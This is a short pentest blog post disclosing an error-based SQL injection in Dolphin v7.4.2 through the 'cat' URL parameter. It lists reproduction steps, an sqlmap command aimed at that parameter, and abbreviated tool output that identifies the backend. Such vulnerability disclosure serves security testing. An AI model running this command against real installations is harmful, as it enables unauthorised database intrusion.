Friday, 19 July 2024

Friday Fun Pentest Series - 8 - dolphinv7.4.2


Description

- It was found that the application suffers from error based SQL injection


SQL Injection

Steps to Reproduce:

  1. Navigate to "Builders" menu
  2. The HTTP GET parameter of "?cat=builders" is displayed in the URL bar
  3. That is the injection point
  4. Automate process with SQLMap


sqlmap -r request.txt --dbms=mysql -p cat

[...]
[INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Apache
back-end DBMS: MySQL >= 5.0.12
[...]
at No comments:
Subscribe to: Comments (Atom)

Friday Fun Pentest Series - 48 - Weak Password Complexity - elggv6.3.3

  Description - It was noted that the "Password Update" functionality allowed users to set weak passwords. Weak Password Complexit...